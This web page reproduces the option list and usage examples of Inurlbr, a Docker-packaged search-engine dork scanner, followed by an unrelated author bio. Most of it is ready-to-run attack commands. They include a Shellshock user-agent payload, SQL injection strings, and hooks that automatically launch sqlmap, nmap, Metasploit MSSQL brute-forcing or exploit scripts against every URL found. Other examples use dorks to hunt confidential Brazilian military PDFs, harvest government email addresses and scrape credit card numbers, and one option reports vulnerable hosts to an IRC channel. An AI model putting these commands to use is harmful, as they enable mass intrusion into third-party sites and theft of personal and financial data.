Docker-Inurlbr – Advanced Search In Search Engines, Enables Analysis Provided To Exploit GET / POST Capturing Emails & Urls

Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.
vulnerable URLs.

Example: -s {file}
Usage: -s your_file.txt

-o Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
Example: -o {file_where_my_urls_are}
Usage: -o tests.txt

--persist Attempts when Google blocks your search.
The script tries to another google host / default = 4
Example: --persist {number_attempts}
Usage: --persist 7

--ifredirect Return validation method post REDIRECT_URL
Example: --ifredirect {string_validation}
Usage: --ifredirect '/admin/painel.php'

-m Enable the search for emails on the urls specified.

-u Enables the search for URL lists on the url specified.

--gc Enable validation of values ​​with google webcache.

--pr Progressive scan, used to set operators (dorks),
makes the search of a dork and valid results, then goes a dork at a time.

--file-cookie Open cookie file.

--save-as Save results in a certain place.

--shellshock Explore shellshock vulnerability by setting a malicious user-agent.

--popup Run --command all or vuln in a parallel terminal.

--cms-check Enable simple check if the url / target is using CMS.

--no-banner Remove the script presentation banner.

--unique Filter results in unique domains.

--beep Beep sound when a vulnerability is found.

--alexa-rank Show alexa positioning in the results.

--robots Show values file robots.

--range Set range IP.
Example: --range {range_start,rage_end}
Usage: --range '172.16.0.5#172.16.0.255'

--range-rand Set amount of random ips.
Example: --range-rand {rand}
Usage: --range-rand '50'

--irc Sending vulnerable to IRC / server channel.
Example: --irc {server#channel}
Usage: --irc 'irc.rizon.net#inurlbrasil'

--http-header Set HTTP header.
Example: --http-header {youemail}
Usage: --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'

--sedmail Sending vulnerable to email.
Example: --sedmail {youemail}
Usage: --sedmail [email protected]

--delay Delay between research processes.
Example: --delay {second}
Usage: --delay 10

--time-out Timeout to exit the process.
Example: --time-out {second}
Usage: --time-out 10

--ifurl Filter URLs based on their argument.
Example: --ifurl {ifurl}
Usage: --ifurl index.php?id=

--ifcode Valid results based on your return http code.
Example: --ifcode {ifcode}
Usage: --ifcode 200

--ifemail Filter E-mails based on their argument.
Example: --ifemail {file_where_my_emails_are}
Usage: --ifemail sp.gov.br

--url-reference Define referring URL in the request to send him against the target.
Example: --url-reference {url}
Usage: --url-reference http://target.com/admin/user/valid.php

--mp Limits the number of pages in the search engines.
Example: --mp {limit}
Usage: --mp 50

--user-agent Define the user agent used in its request against the target.
Example: --user-agent {agent}
Usage: --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
Usage-exploit / SHELLSHOCK:
--user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
Complete command:
php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'

--sall Saves all urls found by the scanner.
Example: --sall {file}
Usage: --sall your_file.txt

--command-vul Every vulnerable URL found will execute this command parameters.
Example: --command-vul {command}
Usage: --command-vul 'nmap sV -p 22,80,21 _TARGET_'
--command-vul './exploit.sh _TARGET_ output.txt'
--command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

--command-all Use this commmand to specify a single command to EVERY URL found.
Example: --command-all {command}
Usage: --command-all 'nmap sV -p 22,80,21 _TARGET_'
--command-all './exploit.sh _TARGET_ output.txt'
--command-all 'php miniexploit.php -t _TARGET_ -s output.txt'
[!] Observation:

_TARGET_ will be replaced by the URL/target found, although if the user
doesn't input the get, only the domain will be executed.

_TARGETFULL_ will be replaced by the original URL / target found.

_TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.

_TARGETIP_ return of ip URL / target found.

_URI_ Back URL set of folders / target found.

_RANDOM_ Random strings.

_PORT_ Capture port of the current test, within the --port-scan process.

_EXPLOIT_ will be replaced by the specified command argument --exploit-command.
The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_

--replace Replace values ​​in the target URL.
Example: --replace {value_old[INURL]value_new}
Usage: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'
--replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'
--replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'

--remove Remove values ​​in the target URL.
Example: --remove {string}
Usage: --remove '/admin.php?id=0'

--regexp Using regular expression to validate his research, the value of the
Expression will be sought within the target/URL.
Example: --regexp {regular_expression}
All Major Credit Cards:
Usage: --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'

IP Addresses:
Usage: --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'

EMAIL:
Usage: --regexp '([wd.-_]+)@([wd._-]+)'


---regexp-filter Using regular expression to filter his research, the value of the
Expression will be sought within the target/URL.
Example: ---regexp-filter {regular_expression}
EMAIL:
Usage: ---regexp-filter '([wd.-_]+)@([wd._-]+)'


[!] Small commands manager:

--exploit-cad Command register for use within the scanner.
Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
Example Format: NMAP::nmap -sV _TARGET_
Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
Usage: --exploit-cad 'NMAP::nmap -sV _TARGET_'
Observation: Each registered command is identified by an id of your array.
Commands are logged in exploits.conf file.

--exploit-all-id Execute commands, exploits based on id of use,
(all) is run for each target found by the engine.
Example: --exploit-all-id {id,id}
Usage: --exploit-all-id 1,2,8,22

--exploit-vul-id Execute commands, exploits based on id of use,
(vull) run command only if the target was considered vulnerable.
Example: --exploit-vul-id {id,id}
Usage: --exploit-vul-id 1,2,8,22

--exploit-list List all entries command in exploits.conf file.


[!] Running subprocesses:

--sub-file Subprocess performs an injection
strings in URLs found by the engine, via GET or POST.
Example: --sub-file {youfile}
Usage: --sub-file exploits_get.txt

--sub-get defines whether the strings coming from
--sub-file will be injected via GET.
Usage: --sub-get

--sub-post defines whether the strings coming from
--sub-file will be injected via POST.
Usage: --sub-get


--sub-cmd-vul Each vulnerable URL found within the sub-process
will execute the parameters of this command.
Example: --sub-cmd-vul {command}
Usage: --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'
--sub-cmd-vul './exploit.sh _TARGET_ output.txt'
--sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

--sub-cmd-all Run command to each target found within the sub-process scope.
Example: --sub-cmd-all {command}
Usage: --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'
--sub-cmd-all './exploit.sh _TARGET_ output.txt'
--sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'


--port-scan Defines ports that will be validated as open.
Example: --port-scan {ports}
Usage: --port-scan '22,21,23,3306'

--port-cmd Define command that runs when finding an open door.
Example: --port-cmd {command}
Usage: --port-cmd './xpl _TARGETIP_:_PORT_'
--port-cmd './xpl _TARGETIP_/file.php?sqli=1'

--port-write Send values for door.
Example: --port-write {'value0','value1','value3'}
Usage: --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"



[!] Modifying values used within script parameters:

md5 Encrypt values in md5.
Example: md5({value})
Usage: md5(102030)
Usage: --exploit-get 'user?id=md5(102030)'

base64 Encrypt values in base64.
Example: base64({value})
Usage: base64(102030)
Usage: --exploit-get 'user?id=base64(102030)'

hex Encrypt values in hex.
Example: hex({value})
Usage: hex(102030)
Usage: --exploit-get 'user?id=hex(102030)'

Generate random values.
Example: random({character_counter})
Usage: random(8)
Usage: --exploit-get 'user?id=random(8)'

Simple Commands

docker exec inurlbr ./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"  

docker exec inurlbr ./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'

docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'

docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'

docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'

docker exec inurlbr ./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 _TARGET_'

docker exec inurlbr ./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'

docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs'

docker exec inurlbr ./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '([wd.-_]+)@([wd._-]+)'

docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m

docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u

docker exec inurlbr ./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6

docker exec inurlbr ./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'

docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6

docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'

docker exec inurlbr ./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_'

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;"

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a 'hello! admin'

docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5

docker exec inurlbr ./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_'

docker exec inurlbr ./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_'

docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8

docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 --pr

docker exec inurlbr ./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --pr --shellshock

docker exec inurlbr ./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --sub-file 'xpls_Arbitrary_File_Download.txt'

Developers

----------------------------------------------
Original Version
----------------------------------------------
[+] AUTOR: googleINURL
[+] EMAIL: [email protected]
[+] Blog: http://blog.inurl.com.br
----------------------------------------------
Docker Version
----------------------------------------------
[+] AUTOR: Gabriel Dutra (c0olr00t)
[+] EMAIL: [email protected]
[+] LINKEDIN: linkedin.com/in/gmdutra/
----------------------------------------------
Download Docker-Inurlbr

Published by Marshmallow

Marshmallow Android is BT Ireland’s Head of Sales for Republic of Ireland domestic multi-site companies, indigenous MNCs and public sector accounts. He is responsible for the direction and control of all sales activity in the region. He has over 10 years management experience from high growth start-ups to more established businesses. He’s led teams in Ireland, India and China across various industries (ICT, On-Line Recruitment, Corporate Training and International Education).